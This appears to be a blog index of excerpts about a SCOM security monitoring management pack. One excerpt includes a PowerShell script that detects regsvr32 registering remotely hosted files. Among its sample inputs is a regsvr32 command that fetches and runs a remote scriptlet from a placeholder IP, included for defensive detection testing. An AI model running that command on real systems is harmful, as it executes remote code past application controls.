SCOM Security Monitoring in Action: Detecting an Attacker

This is a fun little story today, but I got to see first hand how our security management pack works during a real, non-simulated attack.  I was pleasantly surprised by the results.  For the record I keep a couple of labs.  One is internal, blocked from the world, and I spend most of my time…


Using SCOM to Capture Registering Remotely Located DLL Files

I’ve started browsing some sites that are cataloguing known attack vectors and came across this particular vulnerability that is worth discussing.  Many seasoned IT pros understand the use of RegSvr32 to register DLL files.  This executable is very integral to Windows, as it registers DLLs for OS and application use.  A little known flaw is…
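As an added example, not code from the original post or from the Security Monitoring MP itself, the following PowerShell shows the shape of the check the title describes: flag regsvr32.exe launches whose command line points at a remotely located file (an http/https URL or a UNC path). It assumes process creation auditing (Security event 4688) with the "Include command line in process creation events" policy enabled, so that the event carries the command line; the sample command lines are constructed for the demo, and the IP address and hostname in them are placeholders.

```powershell
# Added example (not from the original post): detect regsvr32 registering a
# remotely hosted file. Assumes Security event 4688 includes the Process
# Command Line field (requires the "Include command line in process creation
# events" policy).

function Test-RemoteRegsvr32 {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Only inspect regsvr32 launches (any path, any case, with or without .exe)
    if ($CommandLine -notmatch '(?i)(^|[\\\s"])regsvr32(\.exe)?(\s|"|$)') { return $false }
    # Remote location: an http(s) URL (typically via /i:) or a UNC path
    return [bool]($CommandLine -match '(?i)(https?://|\\\\[^\\\s]+\\)')
}

# Constructed sample command lines (not real telemetry). 203.0.113.10 and
# example.test are documentation placeholders.
$samples = @(
    'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
    'regsvr32 /s /n /u /i:http://203.0.113.10/payload.sct scrobj.dll',
    '"C:\Windows\System32\regsvr32.exe" /s \\fileshare\tools\x.dll',
    'rundll32.exe http://example.test/a.dll,Run'
)
foreach ($cl in $samples) {
    '{0,-5} {1}' -f (Test-RemoteRegsvr32 $cl), $cl
}

# Against the live Security log (run elevated). The CommandLine value is read
# from the event XML by name rather than by property index.
function Get-RemoteRegsvr32Events {
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            $cmd = ($xml.Event.EventData.Data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
            if ($cmd -and (Test-RemoteRegsvr32 $cmd)) {
                [pscustomobject]@{ Time = $_.TimeCreated; CommandLine = $cmd }
            }
        }
}
```

Of the four samples only the second and third are flagged: the local DLL registration is normal, and the rundll32 line is out of scope for this rule. In the real management pack the same logic would live in a SCOM rule targeting the Security log, but the matching criteria are the part worth getting right first, since a loose pattern here is what produces the noise the MP tries to avoid.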


Security Monitoring MP: Powershell Exploit Toolkit Rules

In this post we will discuss using SCOM to detect various PowerShell Exploits that are commercially available for download and use.  I’d note that there are limits to this type of detection activity. First, it is worth noting that good attackers don’t use commercially off the shelf attack tools but instead recompile them to…


Security Monitoring MP AppLocker Rules

I’ll be honest in that these are included because they are easy to do, but in reality, they do not provide much in terms of protection. Traditional anti-virus works to detect many of these tools, and while an attacker can corrupt AV pretty easily, it’s also just as easy to recompile these tools so…


Security Monitoring Management Pack Summary

I’m rewriting the main page for the Security Monitoring MP to be a bit less cluttered.  I will be using this space to document this management pack with a simple link off from there.  I’ll also use this space to document the change log.  As a reminder, this is more than just an import and…


Post Configuration Tasks for the Security Monitoring Management Pack

As I have mentioned in the initial posts, using the security monitoring management pack is going to require certain practices and procedures to be in place.  Simply importing the management pack will not give you a picture of everything that it is designed to monitor.  Ultimately, this management pack serves two purposes.  The first is…


Potential Areas for Noise in the Security Monitoring Management Pack

I stated that a main purpose of this management pack is to keep noise volume to a minimum.  As such, the bulk of the rules in place that will catch normal business activity are disabled.  That said, testing has revealed some alerts that will generate in certain circumstances.  For various reasons, it was decided to…


Event Forwarding and How to Configure it For the Security Monitoring Management Pack

One of the features that was built into the Security Monitoring Management Pack was the ability to discover and then monitor the contents of the Forwarded Events logs for suspicious activity.  The reality for most external attacks is that the breach usually occurs at the user tier through some sort of phishing attack.  Attackers…


Security Monitoring Management Pack GPO Summary

If you’ve been reading my blog, you’ll note that in order to use SCOM for security monitoring, you’ll need to ensure that certain AD auditing policies are configured.  I’m using this page as a landing page to the GPO requirements for this security monitoring MP, as some of this is not turned on by…


Introducing the Security Monitoring Management Pack for SCOM

For those of you who haven’t met me or visited my blog, I’ve worked in SCOM now for the better part of 5 years.  I’ve also done a lot of work in IT Security.  About a year and a half ago, I was able to attend a training class about the anatomy of a…
